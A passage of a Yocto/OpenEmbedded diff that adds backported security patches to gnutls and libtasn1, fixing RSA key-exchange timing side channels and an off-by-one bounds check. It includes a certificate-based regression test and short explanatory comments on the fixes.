++ "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\n"
++ "-----END PKCS7-----\n";
++
++const gnutls_datum_t rca_datum = { (void *)rca_pem, sizeof(rca_pem) - 1 };
++const gnutls_datum_t ca_datum = { (void *)ca_pem, sizeof(ca_pem) - 1 };
++const gnutls_datum_t ee_datum = { (void *)ee_pem, sizeof(ee_pem) - 1 };
++const gnutls_datum_t msg_datum = { (void *)msg_pem, sizeof(msg_pem) - 1 };
++
++static void tls_log_func(int level, const char *str)
++{
++ fprintf(stderr, "%s |<%d>| %s", "err", level, str);
++}
++
++#define CHECK(X)\
++{\
++ r = X;\
++ if (r < 0)\
++ fail("error in %d: %s\n", __LINE__, gnutls_strerror(r));\
++}\
++
++void doit(void)
++{
++ int r;
++ gnutls_x509_crt_t rca_cert = NULL;
++ gnutls_x509_crt_t ca_cert = NULL;
++ gnutls_x509_crt_t ee_cert = NULL;
++ gnutls_x509_trust_list_t tlist = NULL;
++ gnutls_pkcs7_t pkcs7 = NULL;
++ gnutls_datum_t data = { (unsigned char *)"xxx", 3 };
++
++ if (debug) {
++ gnutls_global_set_log_function(tls_log_func);
++ gnutls_global_set_log_level(4711);
++ }
++
++ // Import certificates
++ CHECK(gnutls_x509_crt_init(&rca_cert));
++ CHECK(gnutls_x509_crt_import(rca_cert, &rca_datum, GNUTLS_X509_FMT_PEM));
++ CHECK(gnutls_x509_crt_init(&ca_cert));
++ CHECK(gnutls_x509_crt_import(ca_cert, &ca_datum, GNUTLS_X509_FMT_PEM));
++ CHECK(gnutls_x509_crt_init(&ee_cert));
++ CHECK(gnutls_x509_crt_import(ee_cert, &ee_datum, GNUTLS_X509_FMT_PEM));
++
++ // Setup trust store
++ CHECK(gnutls_x509_trust_list_init(&tlist, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, rca_cert, "rca", 3, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ca_cert, "ca", 2, 0));
++ CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ee_cert, "ee", 2, 0));
++
++ // Setup pkcs7 structure
++ CHECK(gnutls_pkcs7_init(&pkcs7));
++ CHECK(gnutls_pkcs7_import(pkcs7, &msg_datum, GNUTLS_X509_FMT_PEM));
++
++ // Signature verification
++ gnutls_pkcs7_verify(pkcs7, tlist, NULL, 0, 0, &data, 0);
++
++ gnutls_x509_crt_deinit(rca_cert);
++ gnutls_x509_crt_deinit(ca_cert);
++ gnutls_x509_crt_deinit(ee_cert);
++ gnutls_x509_trust_list_deinit(tlist, 0);
++ gnutls_pkcs7_deinit(pkcs7);
++}
+--
+2.25.1
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
new file mode 100644
index 0000000000..943f4ca704
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
@@ -0,0 +1,85 @@
+From 80a6ce8ddb02477cd724cd5b2944791aaddb702a Mon Sep 17 00:00:00 2001
+From: Alexander Sosedkin <asosedkin@redhat.com>
+Date: Tue, 9 Aug 2022 16:05:53 +0200
+Subject: [PATCH] auth/rsa: side-step potential side-channel
+
+Signed-off-by: Alexander Sosedkin <asosedkin@redhat.com>
+Signed-off-by: Hubert Kario <hkario@redhat.com>
+Tested-by: Hubert Kario <hkario@redhat.com>
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/80a6ce8ddb02477cd724cd5b2944791aaddb702a
+ https://gitlab.com/gnutls/gnutls/-/commit/4b7ff428291c7ed77c6d2635577c83a43bbae558]
+CVE: CVE-2023-0361
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/auth/rsa.c | 30 +++---------------------------
+ 1 file changed, 3 insertions(+), 27 deletions(-)
+
+diff --git a/lib/auth/rsa.c b/lib/auth/rsa.c
+index 8108ee8..858701f 100644
+--- a/lib/auth/rsa.c
++++ b/lib/auth/rsa.c
+@@ -155,13 +155,10 @@ static int
+ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+ size_t _data_size)
+ {
+- const char attack_error[] = "auth_rsa: Possible PKCS #1 attack\n";
+ gnutls_datum_t ciphertext;
+ int ret, dsize;
+ ssize_t data_size = _data_size;
+ volatile uint8_t ver_maj, ver_min;
+- volatile uint8_t check_ver_min;
+- volatile uint32_t ok;
+
+ #ifdef ENABLE_SSL3
+ if (get_num_version(session) == GNUTLS_SSL3) {
+@@ -187,7 +184,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+
+ ver_maj = _gnutls_get_adv_version_major(session);
+ ver_min = _gnutls_get_adv_version_minor(session);
+- check_ver_min = (session->internals.allow_wrong_pms == 0);
+
+ session->key.key.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
+ if (session->key.key.data == NULL) {
+@@ -206,10 +202,9 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+ return ret;
+ }
+
+- ret =
+- gnutls_privkey_decrypt_data2(session->internals.selected_key,
+- 0, &ciphertext, session->key.key.data,
+- session->key.key.size);
++ gnutls_privkey_decrypt_data2(session->internals.selected_key,
++ 0, &ciphertext, session->key.key.data,
++ session->key.key.size);
+ /* After this point, any conditional on failure that cause differences
+ * in execution may create a timing or cache access pattern side
+ * channel that can be used as an oracle, so treat very carefully */
+@@ -225,25 +220,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+ * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
+ */
+
+- /* ok is 0 in case of error and 1 in case of success. */
+-
+- /* if ret < 0 */
+- ok = CONSTCHECK_EQUAL(ret, 0);
+- /* session->key.key.data[0] must equal ver_maj */
+- ok &= CONSTCHECK_EQUAL(session->key.key.data[0], ver_maj);
+- /* if check_ver_min then session->key.key.data[1] must equal ver_min */
+- ok &= CONSTCHECK_NOT_EQUAL(check_ver_min, 0) &
+- CONSTCHECK_EQUAL(session->key.key.data[1], ver_min);
+-
+- if (ok) {
+- /* call logging function unconditionally so all branches are
+- * indistinguishable for timing and cache access when debug
+- * logging is disabled */
+- _gnutls_no_log("%s", attack_error);
+- } else {
+- _gnutls_debug_log("%s", attack_error);
+- }
+-
+ /* This is here to avoid the version check attack
+ * discussed above.
+ */
+--
+2.25.1
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
new file mode 100644
index 0000000000..c518cfa0ac
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
@@ -0,0 +1,206 @@
+Backport of:
+
+From 29d6298d0b04cfff970b993915db71ba3f580b6d Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Mon, 23 Oct 2023 09:26:57 +0900
+Subject: [PATCH] auth/rsa_psk: side-step potential side-channel
+
+This removes branching that depends on secret data, porting changes
+for regular RSA key exchange from
+4804febddc2ed958e5ae774de2a8f85edeeff538 and
+80a6ce8ddb02477cd724cd5b2944791aaddb702a. This also removes the
+allow_wrong_pms as it was used solely to control debug output
+depending on the branching.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/gnutls28/3.6.13-2ubuntu1.9/gnutls28_3.6.13-2ubuntu1.9.debian.tar.xz
+Upstream-Commit: https://gitlab.com/gnutls/gnutls/-/commit/29d6298d0b04cfff970b993915db71ba3f580b6d]
+CVE: CVE-2023-5981
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/auth/rsa.c | 2 +-
+ lib/auth/rsa_psk.c | 90 ++++++++++++++++++----------------------------
+ lib/gnutls_int.h | 4 ---
+ lib/priority.c | 1 -
+ 4 files changed, 35 insertions(+), 62 deletions(-)
+
+--- a/lib/auth/rsa.c
++++ b/lib/auth/rsa.c
+@@ -207,7 +207,7 @@ proc_rsa_client_kx(gnutls_session_t sess
+ session->key.key.size);
+ /* After this point, any conditional on failure that cause differences
+ * in execution may create a timing or cache access pattern side
+- * channel that can be used as an oracle, so treat very carefully */
++ * channel that can be used as an oracle, so tread carefully */
+
+ /* Error handling logic:
+ * In case decryption fails then don't inform the peer. Just use the
+--- a/lib/auth/rsa_psk.c
++++ b/lib/auth/rsa_psk.c
+@@ -264,14 +264,13 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
+ {
+ gnutls_datum_t username;
+ psk_auth_info_t info;
+- gnutls_datum_t plaintext;
+ gnutls_datum_t ciphertext;
+ gnutls_datum_t pwd_psk = { NULL, 0 };
+ int ret, dsize;
+- int randomize_key = 0;
+ ssize_t data_size = _data_size;
+ gnutls_psk_server_credentials_t cred;
+ gnutls_datum_t premaster_secret = { NULL, 0 };
++ volatile uint8_t ver_maj, ver_min;
+
+ cred = (gnutls_psk_server_credentials_t)
+ _gnutls_get_cred(session, GNUTLS_CRD_PSK);
+@@ -327,71 +326,47 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
+ }
+ ciphertext.size = dsize;
+
+- ret =
+- gnutls_privkey_decrypt_data(session->internals.selected_key, 0,
+- &ciphertext, &plaintext);
+- if (ret < 0 || plaintext.size != GNUTLS_MASTER_SIZE) {
+- /* In case decryption fails then don't inform
+- * the peer. Just use a random key. (in order to avoid
+- * attack against pkcs-1 formatting).
+- */
+- gnutls_assert();
+- _gnutls_debug_log
+- ("auth_rsa_psk: Possible PKCS #1 format attack\n");
+- if (ret >= 0) {
+- gnutls_free(plaintext.data);
+- }
+- randomize_key = 1;
+- } else {
+- /* If the secret was properly formatted, then
+- * check the version number.
+- */
+- if (_gnutls_get_adv_version_major(session) !=
+- plaintext.data[0]
+- || (session->internals.allow_wrong_pms == 0
+- && _gnutls_get_adv_version_minor(session) !=
+- plaintext.data[1])) {
+- /* No error is returned here, if the version number check
+- * fails. We proceed normally.
+- * That is to defend against the attack described in the paper
+- * "Attacking RSA-based sessions in SSL/TLS" by Vlastimil Klima,
+- * Ondej Pokorny and Tomas Rosa.
+- */
+- gnutls_assert();
+- _gnutls_debug_log
+- ("auth_rsa: Possible PKCS #1 version check format attack\n");
+- }
+- }
++ ver_maj = _gnutls_get_adv_version_major(session);
++ ver_min = _gnutls_get_adv_version_minor(session);
+
++ premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
++ if (premaster_secret.data == NULL) {
++ gnutls_assert();
++ return GNUTLS_E_MEMORY_ERROR;
++ }
++ premaster_secret.size = GNUTLS_MASTER_SIZE;
+
+- if (randomize_key != 0) {
+- premaster_secret.size = GNUTLS_MASTER_SIZE;
+- premaster_secret.data =
+- gnutls_malloc(premaster_secret.size);
+- if (premaster_secret.data == NULL) {
+- gnutls_assert();
+- return GNUTLS_E_MEMORY_ERROR;
+- }
+-
+- /* we do not need strong random numbers here.
+- */
+- ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
+- premaster_secret.size);
+- if (ret < 0) {
+- gnutls_assert();
+- goto cleanup;
+- }
+- } else {
+- premaster_secret.data = plaintext.data;
+- premaster_secret.size = plaintext.size;
++ /* Fallback value when decryption fails. Needs to be unpredictable. */
++ ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
++ premaster_secret.size);
++ if (ret < 0) {
++ gnutls_assert();
++ goto cleanup;
+ }
+
++ gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
++ &ciphertext, premaster_secret.data,
++ premaster_secret.size);
++ /* After this point, any conditional on failure that cause differences
++ * in execution may create a timing or cache access pattern side
++ * channel that can be used as an oracle, so tread carefully */
++
++ /* Error handling logic:
++ * In case decryption fails then don't inform the peer. Just use the
++ * random key previously generated. (in order to avoid attack against
++ * pkcs-1 formatting).
++ *
++ * If we get version mismatches no error is returned either. We
++ * proceed normally. This is to defend against the attack described
++ * in the paper "Attacking RSA-based sessions in SSL/TLS" by
++ * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
++ */
++
+ /* This is here to avoid the version check attack
+ * discussed above.
+ */
+-
+- premaster_secret.data[0] = _gnutls_get_adv_version_major(session);
+- premaster_secret.data[1] = _gnutls_get_adv_version_minor(session);
++ premaster_secret.data[0] = ver_maj;
++ premaster_secret.data[1] = ver_min;
+
+ /* find the key of this username
+ */
+--- a/lib/gnutls_int.h
++++ b/lib/gnutls_int.h
+@@ -989,7 +989,6 @@ struct gnutls_priority_st {
+ bool _no_etm;
+ bool _no_ext_master_secret;
+ bool _allow_key_usage_violation;
+- bool _allow_wrong_pms;
+ bool _dumbfw;
+ unsigned int _dh_prime_bits; /* old (deprecated) variable */
+
+@@ -1007,7 +1006,6 @@ struct gnutls_priority_st {
+ (x)->no_etm = 1; \
+ (x)->no_ext_master_secret = 1; \
+ (x)->allow_key_usage_violation = 1; \
+- (x)->allow_wrong_pms = 1; \
+ (x)->dumbfw = 1
+
+ #define ENABLE_PRIO_COMPAT(x) \
+@@ -1016,7 +1014,6 @@ struct gnutls_priority_st {
+ (x)->_no_etm = 1; \
+ (x)->_no_ext_master_secret = 1; \
+ (x)->_allow_key_usage_violation = 1; \
+- (x)->_allow_wrong_pms = 1; \
+ (x)->_dumbfw = 1
+
+ /* DH and RSA parameters types.
+@@ -1141,7 +1138,6 @@ typedef struct {
+ bool no_etm;
+ bool no_ext_master_secret;
+ bool allow_key_usage_violation;
+- bool allow_wrong_pms;
+ bool dumbfw;
+
+ /* old (deprecated) variable. This is used for both srp_prime_bits
+--- a/lib/priority.c
++++ b/lib/priority.c
+@@ -681,7 +681,6 @@ gnutls_priority_set(gnutls_session_t ses
+ COPY_TO_INTERNALS(no_etm);
+ COPY_TO_INTERNALS(no_ext_master_secret);
+ COPY_TO_INTERNALS(allow_key_usage_violation);
+- COPY_TO_INTERNALS(allow_wrong_pms);
+ COPY_TO_INTERNALS(dumbfw);
+ COPY_TO_INTERNALS(dh_prime_bits);
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
new file mode 100644
index 0000000000..f15c470879
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
@@ -0,0 +1,125 @@
+From 40dbbd8de499668590e8af51a15799fbc430595e Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Wed, 10 Jan 2024 19:13:17 +0900
+Subject: [PATCH] rsa-psk: minimize branching after decryption
+
+This moves any non-trivial code between gnutls_privkey_decrypt_data2
+and the function return in _gnutls_proc_rsa_psk_client_kx up until the
+decryption. This also avoids an extra memcpy to session->key.key.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/40dbbd8de499668590e8af51a15799fbc430595e]
+CVE: CVE-2024-0553
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/auth/rsa_psk.c | 68 ++++++++++++++++++++++++----------------------
+ 1 file changed, 35 insertions(+), 33 deletions(-)
+
+diff --git a/lib/auth/rsa_psk.c b/lib/auth/rsa_psk.c
+index 93c2dc9..c6cfb92 100644
+--- a/lib/auth/rsa_psk.c
++++ b/lib/auth/rsa_psk.c
+@@ -269,7 +269,6 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ int ret, dsize;
+ ssize_t data_size = _data_size;
+ gnutls_psk_server_credentials_t cred;
+- gnutls_datum_t premaster_secret = { NULL, 0 };
+ volatile uint8_t ver_maj, ver_min;
+
+ cred = (gnutls_psk_server_credentials_t)
+@@ -329,24 +328,48 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ ver_maj = _gnutls_get_adv_version_major(session);
+ ver_min = _gnutls_get_adv_version_minor(session);
+
+- premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
+- if (premaster_secret.data == NULL) {
++ /* Find the key of this username. A random value will be
++ * filled in if the key is not found.
++ */
++ ret = _gnutls_psk_pwd_find_entry(session, info->username,
++ strlen(info->username), &pwd_psk);
++ if (ret < 0)
++ return gnutls_assert_val(ret);
++
++ /* Allocate memory for premaster secret, and fill in the
++ * fields except the decryption result.
++ */
++ session->key.key.size = 2 + GNUTLS_MASTER_SIZE + 2 + pwd_psk.size;
++ session->key.key.data = gnutls_malloc(session->key.key.size);
++ if (session->key.key.data == NULL) {
+ gnutls_assert();
++ _gnutls_free_key_datum(&pwd_psk);
++ /* No need to zeroize, as the secret is not copied in yet */
++ _gnutls_free_datum(&session->key.key);
+ return GNUTLS_E_MEMORY_ERROR;
+ }
+- premaster_secret.size = GNUTLS_MASTER_SIZE;
+
+ /* Fallback value when decryption fails. Needs to be unpredictable. */
+- ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
+- premaster_secret.size);
++ ret = gnutls_rnd(GNUTLS_RND_NONCE, session->key.key.data + 2,
++ GNUTLS_MASTER_SIZE);
+ if (ret < 0) {
+ gnutls_assert();
+- goto cleanup;
++ _gnutls_free_key_datum(&pwd_psk);
++ /* No need to zeroize, as the secret is not copied in yet */
++ _gnutls_free_datum(&session->key.key);
++ return ret;
+ }
+
++ _gnutls_write_uint16(GNUTLS_MASTER_SIZE, session->key.key.data);
++ _gnutls_write_uint16(pwd_psk.size,
++ &session->key.key.data[2 + GNUTLS_MASTER_SIZE]);
++ memcpy(&session->key.key.data[2 + GNUTLS_MASTER_SIZE + 2], pwd_psk.data,
++ pwd_psk.size);
++ _gnutls_free_key_datum(&pwd_psk);
++
+ gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
+- &ciphertext, premaster_secret.data,
+- premaster_secret.size);
++ &ciphertext, session->key.key.data + 2,
++ GNUTLS_MASTER_SIZE);
+ /* After this point, any conditional on failure that cause differences
+ * in execution may create a timing or cache access pattern side
+ * channel that can be used as an oracle, so tread carefully */
+@@ -365,31 +388,10 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ /* This is here to avoid the version check attack
+ * discussed above.
+ */
+- premaster_secret.data[0] = ver_maj;
+- premaster_secret.data[1] = ver_min;
++ session->key.key.data[2] = ver_maj;
++ session->key.key.data[3] = ver_min;
+
+- /* find the key of this username
+- */
+- ret =
+- _gnutls_psk_pwd_find_entry(session, info->username, strlen(info->username), &pwd_psk);
+- if (ret < 0) {
+- gnutls_assert();
+- goto cleanup;
+- }
+-
+- ret =
+- set_rsa_psk_session_key(session, &pwd_psk, &premaster_secret);
+- if (ret < 0) {
+- gnutls_assert();
+- goto cleanup;
+- }
+-
+- ret = 0;
+- cleanup:
+- _gnutls_free_key_datum(&pwd_psk);
+- _gnutls_free_temp_key_datum(&premaster_secret);
+-
+- return ret;
++ return 0;
+ }
+
+ static int
+--
+2.25.1
+
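
Note: the hunks above restructure _gnutls_proc_rsa_psk_client_kx so that every fallible step (PSK lookup, allocation, random fallback generation) happens before the RSA decryption, and the ciphertext is then decrypted directly over a buffer already filled with random bytes. A minimal sketch of that pattern, with hypothetical helper names standing in for the gnutls primitives (illustrative only, not part of the patch):

    #include <stddef.h>

    /* Hypothetical stand-ins for gnutls_rnd() and
     * gnutls_privkey_decrypt_data2(); declarations only. */
    int get_random(unsigned char *buf, size_t len);
    int rsa_decrypt_inplace(const unsigned char *ct, size_t ct_len,
                            unsigned char *out, size_t out_len);

    int recover_premaster(unsigned char *out, size_t out_len,
                          const unsigned char *ct, size_t ct_len)
    {
        /* Fill the output with the random fallback first; failing here
         * is safe because no secret has been handled yet. */
        if (get_random(out, out_len) < 0)
            return -1;

        /* Decrypt in place and deliberately ignore the result: a padding
         * failure simply leaves the random fallback, so control flow does
         * not branch on whether the decryption succeeded. */
        (void)rsa_decrypt_inplace(ct, ct_len, out, out_len);
        return 0;
    }
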
diff --git a/meta/recipes-support/gnutls/gnutls_3.6.14.bb b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
index 51578b4b3b..a1451daf2c 100644
--- a/meta/recipes-support/gnutls/gnutls_3.6.14.bb
+++ b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
@@ -1,5 +1,7 @@
SUMMARY = "GNU Transport Layer Security Library"
-HOMEPAGE = "http://www.gnu.org/software/gnutls/"
+DESCRIPTION = "a secure communications library implementing the SSL, \
+TLS and DTLS protocols and technologies around them."
+HOMEPAGE = "https://gnutls.org/"
BUGTRACKER = "https://savannah.gnu.org/support/?group=gnutls"
LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -21,6 +23,13 @@ SRC_URI = "https://www.gnupg.org/ftp/gcrypt/gnutls/v${SHRT_VER}/gnutls-${PV}.tar
file://arm_eabi.patch \
file://0001-Modied-the-license-to-GPLv2.1-to-keep-with-LICENSE-f.patch \
file://CVE-2020-24659.patch \
+ file://CVE-2021-20231.patch \
+ file://CVE-2021-20232.patch \
+ file://CVE-2022-2509.patch \
+ file://CVE-2021-4209.patch \
+ file://CVE-2023-0361.patch \
+ file://CVE-2023-5981.patch \
+ file://CVE-2024-0553.patch \
"
SRC_URI[sha256sum] = "5630751adec7025b8ef955af4d141d00d252a985769f51b4059e5affa3d39d63"
diff --git a/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch b/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch
new file mode 100644
index 0000000000..9a8ceecbe7
--- /dev/null
+++ b/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch
@@ -0,0 +1,45 @@
+From 22fd12b290adea788122044cb58dc9e77754644f Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Thu, 17 Nov 2022 12:07:50 +0530
+Subject: [PATCH] CVE-2021-46848
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5]
+CVE: CVE-2021-46848
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+Fix ETYPE_OK off by one array size check.
+---
+ NEWS | 4 ++++
+ lib/int.h | 2 +-
+ 2 files changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/NEWS b/NEWS
+index f042481..d8f684e 100644
+--- a/NEWS
++++ b/NEWS
+@@ -1,5 +1,9 @@
+ GNU Libtasn1 NEWS -*- outline -*-
+
++* Noteworthy changes in release ?.? (????-??-??) [?]
++- Fix ETYPE_OK out of bounds read. Closes: #32.
++- Update gnulib files and various maintenance fixes.
++
+ * Noteworthy changes in release 4.16.0 (released 2020-02-01) [stable]
+ - asn1_decode_simple_ber: added support for constructed definite
+ octet strings. This allows this function decode the whole set of
+diff --git a/lib/int.h b/lib/int.h
+index ea16257..c877282 100644
+--- a/lib/int.h
++++ b/lib/int.h
+@@ -97,7 +97,7 @@ typedef struct tag_and_class_st
+ #define ETYPE_TAG(etype) (_asn1_tags[etype].tag)
+ #define ETYPE_CLASS(etype) (_asn1_tags[etype].class)
+ #define ETYPE_OK(etype) (((etype) != ASN1_ETYPE_INVALID && \
+- (etype) <= _asn1_tags_size && \
++ (etype) < _asn1_tags_size && \
+ _asn1_tags[(etype)].desc != NULL)?1:0)
+
+ #define ETYPE_IS_STRING(etype) ((etype == ASN1_ETYPE_GENERALSTRING || \
+--
+2.25.1
+
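
Note: the one-character change above matters because _asn1_tags has _asn1_tags_size entries, so the largest valid index is _asn1_tags_size - 1; accepting etype == _asn1_tags_size reads one element past the end. A self-contained illustration of the corrected bound check (hypothetical array, not libtasn1 code):

    #include <stdio.h>

    int main(void)
    {
        int tags[4] = {10, 20, 30, 40};
        size_t tags_size = sizeof(tags) / sizeof(tags[0]);
        size_t etype = 4;                     /* one past the end */

        /* 'etype <= tags_size' would accept 4 and read tags[4] out of
         * bounds; 'etype < tags_size' correctly rejects it. */
        if (etype < tags_size)
            printf("tag %d\n", tags[etype]);
        else
            printf("invalid etype %zu\n", etype);
        return 0;
    }
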
diff --git a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
index 8337b70241..d2b3c492ec 100644
--- a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
+++ b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
@@ -1,4 +1,6 @@
